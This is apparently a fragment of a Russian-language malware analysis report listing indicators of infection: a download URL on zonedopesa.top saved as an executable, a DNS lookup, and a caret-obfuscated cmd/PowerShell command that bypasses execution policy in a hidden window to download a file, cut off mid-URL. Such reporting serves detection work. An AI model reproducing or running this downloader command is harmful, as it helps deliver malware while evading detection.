Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owersh^elL^.ExE -exe^c^Uti^onPo^l^iC^y^ Byp^ASs^ ^-^N^oProF^ILe^ ^-Win^DOws^TYl^e^ ^H^id^dE^n^ (^n^E^W-Ob^JeC^T^ SYSTEM.N^et^.^w^E^BC^lie^NT^).D^o^wn^L^oaD^Fi^le('http://www...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "p^owersh^elL^.ExE -exe^c^Uti^onPo^l^iC^y^ Byp^ASs^ ^-^N^oProF^ILe^ ^-Win^DOws^TYl^e^ ^H^id^dE^n^ (^n^E^W-Ob^JeC^T^ SYSTEM.N^et^.^w^E^BC^lie^NT^).D^o^wn^L^oaD^Fi^le('http://www...' (со скрытым окном)